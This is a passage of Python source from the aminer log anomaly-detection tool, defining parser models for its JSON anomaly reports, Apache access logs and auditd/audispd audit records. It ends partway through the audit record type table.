            "_AffectedLogAtomValues": [VariableByteDataModelElement("affected_log_atom_value", alphabet)],
            "_Metadata": {
                "TimeFirstOccurrence": DecimalFloatValueModelElement("time_first_occurrence"),
                "TimeLastOccurrence": DecimalFloatValueModelElement("time_last_occurrence"),
                "NumberOfOccurrences": DecimalIntegerValueModelElement("number_of_occurrences")
            },
            # Parsed atom of the reporting instance: arbitrary keys, string leaves.
            "_ParsedLogAtom": {"ALLOW_ALL_KEYS": VariableByteDataModelElement("allow_all_keys", alphabet)},
            "_FeatureList": [{
                "Rule": {
                    "type": VariableByteDataModelElement("type", name_alphabet),
                    "path": path,
                    "_value": VariableByteDataModelElement("value", alphabet),
                    "match_action": VariableByteDataModelElement("match_action", filename_alphabet),
                    "log_total": DecimalIntegerValueModelElement("log_total"),
                    "log_success": DecimalIntegerValueModelElement("log_success")
                },
                "Index": DecimalIntegerValueModelElement("index"),
                "CreationTime": DecimalFloatValueModelElement("creation_time"),
                "LastTriggerTime": DecimalFloatValueModelElement("last_trigger_time"),
                "TriggerCount": DecimalIntegerValueModelElement("trigger_count")
            }],
            "_AnalysisStatus": VariableByteDataModelElement("analysis_status", alphabet),
            "_TotalRecords": DecimalIntegerValueModelElement("total_records"),
            "_HistogramData": [{
                "TotalElements": DecimalIntegerValueModelElement("total_elements"),
                "BinnedElements": DecimalIntegerValueModelElement("binned_elements"),
                "HasOutlierBinsFlag": has_outlier_bins_flag,
                "Bins": {"ALLOW_ALL_KEYS": DecimalIntegerValueModelElement("bin")},
                "BinDefinition": {
                    "Type": FixedWordlistDataModelElement("type", [b"ModuloTimeBinDefinition", b"LinearNumericBinDefinition"]),
                    "LowerLimit": DecimalIntegerValueModelElement("lower_limit"),
                    "BinSize": DecimalIntegerValueModelElement("bin_size"),
                    "BinCount": DecimalIntegerValueModelElement("bin_count"),
                    "OutlierBinsFlag": has_outlier_bins_flag,
                    # Bin labels of the form "[0-10]", "...-10]" or "[10-...".
                    "BinNames": [
                        SequenceModelElement("bin_names", [
                            FirstMatchModelElement("first", [
                                SequenceModelElement("lower", [
                                    FixedDataModelElement("open_bracket", b"["),
                                    DecimalIntegerValueModelElement("value")
                                ]),
                                FixedDataModelElement("dots", b"...")
                            ]),
                            FixedDataModelElement("hyphen", b"-"),
                            FirstMatchModelElement("first", [
                                SequenceModelElement("upper", [
                                    DecimalIntegerValueModelElement("value"),
                                    FixedDataModelElement("close_bracket", b"]")
                                ]),
                                FixedDataModelElement("dots", b"...")
                            ]),
                        ])
                    ],
                    "ExpectedBinRatio": DecimalFloatValueModelElement("expected_bin_ratio"),
                    "_ModuloValue": DecimalIntegerValueModelElement("modulo_value"),
                    "_TimeUnit": DecimalIntegerValueModelElement("time_unit")
                },
                "PropertyPath": VariableByteDataModelElement("property_path", filename_alphabet),
            }],
            "_ReportInterval": DecimalIntegerValueModelElement("report_interval"),
            "_ResetAfterReportFlag": FixedWordlistDataModelElement("reset_after_report_flag", [b"true", b"false"]),
            "_MissingPaths": [VariableByteDataModelElement("missing_paths", alphabet)],
            "_AnomalyScores": [{
                "Path": path,
                "AnalysisData": {
                    "New": {
                        "N": DecimalIntegerValueModelElement("n"),
                        "Avg": DecimalFloatValueModelElement("avg"),
                        "Var": DecimalFloatValueModelElement("var")
                    },
                    "Old": {
                        "N": DecimalIntegerValueModelElement("n"),
                        "Avg": DecimalFloatValueModelElement("avg"),
                        "Var": DecimalFloatValueModelElement("var")
                    }
                }
            }],
            "_MinBinElements": DecimalIntegerValueModelElement("min_bin_elements"),
            "_MinBinTime": DecimalIntegerValueModelElement("min_bin_time"),
            "_DebugMode": FixedWordlistDataModelElement("debug_mode", [b"true", b"false"]),
            "_Rule": {
                "RuleId": VariableByteDataModelElement("id", filename_alphabet),
                "MinTimeDelta": DecimalIntegerValueModelElement("min_time_delta"),
                "MaxTimeDelta": DecimalIntegerValueModelElement("max_time_delta"),
                "ArtefactMatchParameters": [
                    path
                ],
                "HistoryAEvents": "EMPTY_ARRAY",
                "HistoryBEvents": "EMPTY_ARRAY",
                "LastTimestampSeen": DecimalFloatValueModelElement("last_timestamp_seen"),
                "correlation_history": {
                    "MaxItems": DecimalIntegerValueModelElement("max_items"),
                    "History": [
                        VariableByteDataModelElement("value", alphabet)
                    ]
                }
            },
            "_CheckResult": [VariableByteDataModelElement("value", alphabet_with_newline)],
            "_NewestTimestamp": DecimalFloatValueModelElement("newest_timestamp")
        },
        "_TotalRecords": DecimalIntegerValueModelElement("total_records"),
        # Unconstrained subtree.
        "_TypeInfo": "ALLOW_ALL",
        "_RuleInfo": {
            "Rule": rule,
            "Expected": expected,
            "Observed": observed
        },
        "_LogData": {
            "RawLogData": [VariableByteDataModelElement("raw_log_data", alphabet)],
            "Timestamps": [DecimalFloatValueModelElement("timestamp")],
            "DetectionTimestamp": DecimalFloatValueModelElement("detection_timestamp"),
            "LogLinesCount": DecimalIntegerValueModelElement("lines_count"),
            "_AnnotatedMatchElement": VariableByteDataModelElement("annotated_match_element", alphabet_with_newline),
        },
        # One entry per log source; the key (its name) is not constrained.
        "_StatusInfo": {"ALLOW_ALL_KEYS": {
            "CurrentProcessedLines": DecimalIntegerValueModelElement("current_processed_lines"),
            "TotalProcessedLines": DecimalIntegerValueModelElement("total_processed_lines")
        }},
        "_FromTime": DecimalFloatValueModelElement("from_time"),
        "_ToTime": DecimalFloatValueModelElement("to_time"),
        "_DebugLog": [OptionalMatchModelElement("optional", VariableByteDataModelElement("debug_log", alphabet))]
    }, "_")
    return model
logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py000066400000000000000000000054541500476301700323420ustar00rootroot00000000000000
from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement


def get_model():
    """Return a parser for apache2 access.log.

    Accepts the common log format
    ``<host> <ident> <user> [<time>] "<method> <request> <version>" <status> <size>``
    and, through the optional trailing group, the combined format with
    ``"<referer>" "<user_agent>"`` appended.

    :return: the root SequenceModelElement "accesslog".
    """
    # Host names, IPv4 and (because of ":") IPv6 literals.
    alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-:"
    # The opening "[" is part of the date format; the closing '] "' is sp3.
    new_time_model = DateTimeModelElement("time", b"[%d/%b/%Y:%H:%M:%S%z")
    host_name_model = VariableByteDataModelElement("host", alphabet)
    identity_model = VariableByteDataModelElement("ident", alphabet)
    # NOTE(review): no "@", "_" or "%" in this alphabet, so a remote user such
    # as "jane@example.org" does not match and the whole line stays unparsed.
    user_name_model = VariableByteDataModelElement("user", b"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.-")
    # Either a bare "-" (presumably what Apache logs for unreadable requests)
    # or "<METHOD> <request> <version>".  Methods outside this list -- WebDAV
    # verbs or the garbage scanners send -- make the line unparsed, which is
    # worth knowing when the unparsed-atom stream is used as a signal.
    request_method_model = FirstMatchModelElement("fm", [
        FixedDataModelElement("dash", b"-"),
        SequenceModelElement("request", [
            FixedWordlistDataModelElement("method", [
                b"GET", b"POST", b"PUT", b"HEAD", b"DELETE",
                b"CONNECT", b"OPTIONS", b"TRACE", b"PATCH"]),
            FixedDataModelElement("sp5", b" "),
            # Apache writes '\"' and '\\' for quotes and backslashes inside
            # logged strings; the third argument (presumably the escape
            # character) keeps such sequences from ending the match early.
            DelimitedDataModelElement("request", b" ", b"\\"),
            FixedDataModelElement("sp6", b" "),
            DelimitedDataModelElement("version", b'"'),
        ])
    ])
    status_code_model = DecimalIntegerValueModelElement("status")
    # NOTE(review): Apache's %b writes "-" rather than 0 when no body was sent
    # (e.g. 304 responses); such lines will not match an integer here --
    # confirm the LogFormat in use (%B logs a plain 0).
    size_model = DecimalIntegerValueModelElement("size")
    whitespace_str = b" "
    model = SequenceModelElement("accesslog", [
        host_name_model,
        FixedDataModelElement("sp0", whitespace_str),
        identity_model,
        FixedDataModelElement("sp1", whitespace_str),
        user_name_model,
        FixedDataModelElement("sp2", whitespace_str),
        new_time_model,
        FixedDataModelElement("sp3", b'] "'),
        request_method_model,
        FixedDataModelElement("sp6", b'" '),
        status_code_model,
        FixedDataModelElement("sp7", whitespace_str),
        size_model,
        # Combined-format tail; absent in plain common-log lines.
        OptionalMatchModelElement(
            "combined", SequenceModelElement("combined", [
                FixedDataModelElement("sp9", b' "'),
                DelimitedDataModelElement("referer", b'"', b"\\"),
                FixedDataModelElement("sp10", b'" "'),
                DelimitedDataModelElement("user_agent", b'"', b"\\"),
                FixedDataModelElement("sp11", b'"')
            ]))
    ])
    return model
logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/AudispdParsingModel.py000066400000000000000000001400211500476301700327430ustar00rootroot00000000000000
"""This module contains functions and classes to create the parsing model."""
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from
aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.MatchElement import MatchElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement from aminer.parsing.ModelElementInterface import ModelElementInterface def get_model(): """Return a model to parse a audispd message logged via syslog after any standard logging preamble, e.g. from syslog.""" class ExecArgumentDataModelElement(ModelElementInterface): """This is a helper class for parsing the (encoded) exec argument strings found within audit logs.""" def get_match_element(self, target_path: str, match_context): """Find the maximum number of bytes belonging to an exec argument. @return a match when at least two bytes were found including the delimiters. 
""" data = match_context.match_data match_len = 0 if data[0] == ord(b'"'): match_len = data.find(b'"', 1) if match_len == -1: return None match_value = data[1:match_len] match_len += 1 elif data.startswith(b"(null)"): match_len = 6 match_value = None else: # Must be upper case hex encoded: match_value = b"" next_value = -1 for d_byte in data: if 0x30 <= d_byte <= 0x39: d_byte -= 0x30 elif 0x41 <= d_byte <= 0x46: d_byte -= 0x37 else: break if next_value == -1: next_value = (d_byte << 4) else: match_value += bytearray(((next_value | d_byte),)) next_value = -1 match_len += 1 if next_value != -1: return None match_data = data[:match_len] match_context.update(match_data) return MatchElement(f"{target_path}/{self.element_id}", match_data, match_value, None) pam_status_word_list = FixedWordlistDataModelElement("status", [b"failed", b"success"]) pid = b" pid=" uid = b" uid=" auid = b" auid=" gid = b" gid=" ses = b" ses=" exe = b' exe="' hostname = b'" hostname=' hostname1 = b'" (hostname=' addr = b" addr=" addr1 = b", addr=" terminal = b" terminal=" terminal1 = b", terminal=" res = b" res=" exe1 = b'" exe="' subj = b" subj=" comm = b" comm=" reason = b" reason=" dev = b" dev=" sig = b" sig=" alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-" perms_alphabet = b"abcdefghijklmnopqrstuvwxyz," type_branches = { "ADD_GROUP": SequenceModelElement("addgroup", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s5", b" msg='op=adding group acct=\""), DelimitedDataModelElement("acct", b'"'), FixedDataModelElement("s6", b'"'), FixedDataModelElement("s7", exe), DelimitedDataModelElement("exec", b'"'), 
FixedDataModelElement("s8", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s9", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s10", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s11", res), pam_status_word_list, FixedDataModelElement("s12", b"'"), ]), "ADD_USER": SequenceModelElement("adduser", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", subj), DelimitedDataModelElement("subj", b" "), FixedWordlistDataModelElement("s5", [b" msg='op=adding user id=", b" msg='op=adding home directory id="]), DecimalIntegerValueModelElement("newuserid"), FixedDataModelElement("s6", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s7", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s8", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s9", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s10", res), pam_status_word_list, FixedDataModelElement("s11", b"'"), ]), "ANOM_ABEND": SequenceModelElement("anom_abend", [ FixedDataModelElement("s0", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", gid), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s5", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s6", comm), ExecArgumentDataModelElement("command"), FixedDataModelElement("s7", reason), ExecArgumentDataModelElement("reason"), 
FixedDataModelElement("s8", sig), DecimalIntegerValueModelElement("sig") ]), "ANOM_ACCESS_FS": AnyByteDataModelElement("anom_access_fs"), "ANOM_ADD_ACCT": AnyByteDataModelElement("anom_add_acct"), "ANOM_AMTU_FAIL": AnyByteDataModelElement("anom_amtu_fail"), "ANOM_CRYPTO_FAIL": AnyByteDataModelElement("anom_crypto_fail"), "ANOM_DEL_ACCT": AnyByteDataModelElement("anom_del_acct"), "ANOM_EXEC": SequenceModelElement("anom_exec", [ FixedDataModelElement("space", b" "), VariableByteDataModelElement("user", alphabet), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b" msg='op="), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s5", b' acct="'), DelimitedDataModelElement("acct", b'"'), FixedDataModelElement("s6", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s7", hostname1), DelimitedDataModelElement("hostname", b","), FixedDataModelElement("s8", addr1), DelimitedDataModelElement("addr", b","), FixedDataModelElement("s9", terminal1), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s10", res), pam_status_word_list, FixedDataModelElement("s11", b")'") ]), "ANOM_LOGIN_ACCT": AnyByteDataModelElement("anom_login_acct"), "ANOM_LOGIN_FAILURES": AnyByteDataModelElement("anom_login_failures"), "ANOM_LOGIN_LOCATION": AnyByteDataModelElement("anom_login_location"), "ANOM_LOGIN_SESSIONS": AnyByteDataModelElement("anom_login_sessions"), "ANOM_LOGIN_TIME": AnyByteDataModelElement("anom_login_time"), "ANOM_MAX_DAC": AnyByteDataModelElement("anom_max_dac"), "ANOM_MAX_MAC": AnyByteDataModelElement("anom_max_mac"), "ANOM_MK_EXEC": AnyByteDataModelElement("anom_mk_exec"), "ANOM_MOD_ACCT": AnyByteDataModelElement("anom_mod_acct"), "ANOM_PROMISCUOUS": 
SequenceModelElement("anom_promiscuous", [ FixedDataModelElement("s0", b" dev="), VariableByteDataModelElement("dev", alphabet), FixedDataModelElement("s1", b" prom="), DecimalIntegerValueModelElement("prom"), FixedDataModelElement("s2", b" old_prom="), DecimalIntegerValueModelElement("old_prom"), FixedDataModelElement("s3", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s4", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s5", gid), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("s6", ses), DecimalIntegerValueModelElement("ses"), ]), "ANOM_RBAC_FAIL": AnyByteDataModelElement("anom_rbac_fail"), "ANOM_RBAC_INTEGRITY_FAIL": AnyByteDataModelElement("anom_rbac_integrity_fail"), "ANOM_ROOT_TRANS": AnyByteDataModelElement("anom_root_trans"), "AVC": AnyByteDataModelElement("avc"), "AVC_PATH": AnyByteDataModelElement("avc_path"), "BPRM_FCAPS": SequenceModelElement("bprmfcaps", [ FixedDataModelElement("s0", b" fver="), DecimalIntegerValueModelElement("fver"), FixedDataModelElement("s1", b" fp="), HexStringModelElement("fp"), FixedDataModelElement("s2", b" fi="), HexStringModelElement("fi"), FixedDataModelElement("s3", b" fe="), HexStringModelElement("fe"), FixedDataModelElement("s4", b" old_pp="), DelimitedDataModelElement("pp-old", b" "), FixedDataModelElement("s5", b" old_pi="), DelimitedDataModelElement("pi-old", b' '), FixedDataModelElement("s6", b" old_pe="), DelimitedDataModelElement("pe-old", b" "), FixedDataModelElement("s7", b" new_pp="), DelimitedDataModelElement("pp-new", b" "), FixedDataModelElement("s8", b" new_pi="), DelimitedDataModelElement("pi-new", b" "), FixedDataModelElement("s9", b" new_pe="), AnyByteDataModelElement("pe-new") ]), "CAPSET": AnyByteDataModelElement("capset"), "CHGRP_ID": AnyByteDataModelElement("chgrp_id"), "CHUSER_ID": AnyByteDataModelElement("chuser_id"), "CONFIG_CHANGE": SequenceModelElement("conf-change", [ FixedDataModelElement("s0", auid), 
DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s1", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s2", b' op="'), DelimitedDataModelElement("op", b'"'), FixedDataModelElement("s3", b'" path="'), DelimitedDataModelElement("path", b'"'), FixedDataModelElement("s4", b'" key='), DelimitedDataModelElement("key", b" "), FixedDataModelElement("s5", b' list='), DecimalIntegerValueModelElement("list"), FixedDataModelElement("s6", res), DecimalIntegerValueModelElement("result") ]), "CRED_ACQ": SequenceModelElement("credacq", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:setcred acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'"), ]), "CRED_DISP": SequenceModelElement("creddisp", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:setcred acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", 
b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'"), ]), "CRED_REFR": SequenceModelElement("creddisp", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:setcred acct="root" exe="/usr/sbin/sshd" hostname='), IpAddressDataModelElement("clientname"), FixedDataModelElement("s5", addr), IpAddressDataModelElement("clientip"), FixedDataModelElement("s6", terminal), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s7", res), pam_status_word_list, FixedDataModelElement("s8", b"'"), ]), "CRYPTO_FAILURE_USER": AnyByteDataModelElement("crypto_failure_user"), "CRYPTO_KEY_USER": AnyByteDataModelElement("crypto_key_user"), "CRYPTO_LOGIN": AnyByteDataModelElement("crypto_login"), "CRYPTO_LOGOUT": AnyByteDataModelElement("crypto_logout"), "CRYPTO_PARAM_CHANGE_USER": AnyByteDataModelElement("crypto_param_change_user"), "CRYPTO_REPLAY_USER": AnyByteDataModelElement("crypto_replay_user"), "CRYPTO_SESSION": SequenceModelElement("crypto_session", [ FixedDataModelElement("space", b" "), VariableByteDataModelElement("user", alphabet), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s4", b" msg='op="), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s5", b' direction='), DelimitedDataModelElement("direction", b' '), FixedDataModelElement("s6", b' cipher='), 
DelimitedDataModelElement("cipher", b' '), FixedDataModelElement("s7", b' ksize='), DecimalIntegerValueModelElement("ksize"), FixedDataModelElement("s8", b' rport='), DecimalIntegerValueModelElement("rport"), FixedDataModelElement("s9", b' laddr='), IpAddressDataModelElement("laddr"), FixedDataModelElement("s10", b' lport='), DecimalIntegerValueModelElement("lport"), FixedDataModelElement("s11", b' id='), DecimalIntegerValueModelElement("id"), FixedDataModelElement("s12", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s13", hostname1), DelimitedDataModelElement("hostname", b","), FixedDataModelElement("s14", addr1), DelimitedDataModelElement("addr", b","), FixedDataModelElement("s15", terminal1), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s16", res), pam_status_word_list, FixedDataModelElement("s17", b")'") ]), "CRYPTO_TEST_USER": AnyByteDataModelElement("crypto_test_user"), "CWD": SequenceModelElement("cwd", [ FixedDataModelElement("s0", b" cwd="), ExecArgumentDataModelElement("cwd")]), "DAC_CHECK": AnyByteDataModelElement("dac_check"), "DAEMON_ABORT": SequenceModelElement("daemon_abort", [ FixedDataModelElement("s0", b" auditd error halt,"), FixedDataModelElement("s1", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s2", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s3", res), pam_status_word_list ]), "DAEMON_ACCEPT": AnyByteDataModelElement("daemon_accept"), "DAEMON_CLOSE": AnyByteDataModelElement("daemon_close"), "DAEMON_CONFIG": SequenceModelElement("daemon_config", [ FixedDataModelElement("s0", b" auditd error getting hup info - no change, sending"), FixedDataModelElement("s1", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s2", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s3", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s4", res), pam_status_word_list ]), "DAEMON_END": 
SequenceModelElement("daemon_end", [ FixedDataModelElement("s0", b" auditd normal halt, sending"), FixedDataModelElement("s1", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s2", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s3", subj), OptionalMatchModelElement("optional_subj", DelimitedDataModelElement("subj", b" ")), FixedDataModelElement("s4", res), pam_status_word_list ]), "DAEMON_RESUME": SequenceModelElement("daemon_resume", [ FixedDataModelElement("s0", b" auditd resuming logging, sending"), FixedDataModelElement("s1", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s2", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s3", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s4", res), pam_status_word_list ]), "DAEMON_ROTATE": AnyByteDataModelElement("daemon_rotate"), "DAEMON_START": SequenceModelElement("daemon_start", [ FixedDataModelElement("s0", b" auditd start, ver="), DecimalFloatValueModelElement("ver"), FixedDataModelElement("s1", b" format="), DelimitedDataModelElement("format", b" "), FixedDataModelElement("s2", b" kernel="), DelimitedDataModelElement("kernel", b" "), FixedDataModelElement("s3", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s4", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s5", res), pam_status_word_list ]), "DEL_GROUP": AnyByteDataModelElement("del_group"), "DEL_USER": AnyByteDataModelElement("del_user"), "EOE": AnyByteDataModelElement("eoe"), "EXECVE": SequenceModelElement("execve", [ FixedDataModelElement("s0", b" argc="), DecimalIntegerValueModelElement("argc"), # We need a type branch here also, but there is no additional data in EOE records after Ubuntu Trusty any more. 
RepeatedElementDataModelElement("arg", SequenceModelElement("execarg", [ FixedDataModelElement("s0", b" a"), DecimalIntegerValueModelElement("argn"), FixedDataModelElement("s1", b"="), ExecArgumentDataModelElement("argval") ])) ]), "FD_PAIR": SequenceModelElement("fdpair", [ FixedDataModelElement("s0", b" fd0="), DecimalIntegerValueModelElement("fd0"), FixedDataModelElement("s1", b" fd1="), DecimalIntegerValueModelElement("fd1") ]), "FS_RELABEL": AnyByteDataModelElement("fs_relabel"), "GRP_AUTH": AnyByteDataModelElement("grp_auth"), "INTEGRITY_DATA": AnyByteDataModelElement("integrity_data"), "INTEGRITY_HASH": AnyByteDataModelElement("integrity_hash"), "INTEGRITY_METADATA": AnyByteDataModelElement("integrity_metadata"), "INTEGRITY_PCR": AnyByteDataModelElement("integrity_pcr"), "INTEGRITY_RULE": AnyByteDataModelElement("integrity_rule"), "INTEGRITY_STATUS": AnyByteDataModelElement("integrity_status"), "IPC": AnyByteDataModelElement("ipc"), "IPC_SET_PERM": AnyByteDataModelElement("ipc_set_perm"), "KERNEL": AnyByteDataModelElement("kernel"), "KERNEL_OTHER": AnyByteDataModelElement("kernel_other"), "LABEL_LEVEL_CHANGE": AnyByteDataModelElement("label_level_change"), "LABEL_OVERRIDE": AnyByteDataModelElement("label_override"), # This message differs on Ubuntu 32/64 bit variants. 
"LOGIN": SequenceModelElement("login", [ FixedDataModelElement("s0", b" login"), FixedDataModelElement("s1", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s2", uid), DecimalIntegerValueModelElement("uid"), FixedWordlistDataModelElement("s3", [b" old auid=", b" old-auid="]), DecimalIntegerValueModelElement("auid-old"), FixedWordlistDataModelElement("s4", [b" new auid=", auid]), DecimalIntegerValueModelElement("auid-new"), FixedWordlistDataModelElement("s5", [b" old ses=", b" old-ses="]), DecimalIntegerValueModelElement("ses-old"), FixedWordlistDataModelElement("s6", [b" new ses=", ses]), DecimalIntegerValueModelElement("ses-new"), OptionalMatchModelElement("optional_result", SequenceModelElement("result_seq", [ FixedDataModelElement("s7", res), DecimalIntegerValueModelElement("result") ])) ]), "MAC_CIPSOV4_ADD": AnyByteDataModelElement("mac_cipsov4_add"), "MAC_CIPSOV4_DEL": AnyByteDataModelElement("mac_cipsov4_del"), "MAC_CONFIG_CHANGE": AnyByteDataModelElement("mac_config_change"), "MAC_IPSEC_EVENT": AnyByteDataModelElement("mac_ipsec_event"), "MAC_MAP_ADD": AnyByteDataModelElement("mac_map_add"), "MAC_MAP_DEL": AnyByteDataModelElement("mac_map_del"), "MAC_POLICY_LOAD": AnyByteDataModelElement("mac_policy_load"), "MAC_STATUS": SequenceModelElement("mac_status", [ FixedDataModelElement("s0", b" enforcing="), DecimalIntegerValueModelElement("enforcing"), FixedDataModelElement("s1", b" old_enforcing="), DecimalIntegerValueModelElement("old_enforcing"), FixedDataModelElement("s2", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses") ]), "MAC_UNLBL_ALLOW": AnyByteDataModelElement("mac_unlbl_allow"), "MAC_UNLBL_STCADD": AnyByteDataModelElement("mac_unlbl_stcadd"), "MAC_UNLBL_STCDEL": AnyByteDataModelElement("mac_unlbl_stcdel"), "MMAP": AnyByteDataModelElement("mmap"), "MQ_GETSETATTR": AnyByteDataModelElement("mq_getsetattr"), "MQ_NOTIFY": AnyByteDataModelElement("mq_notify"), 
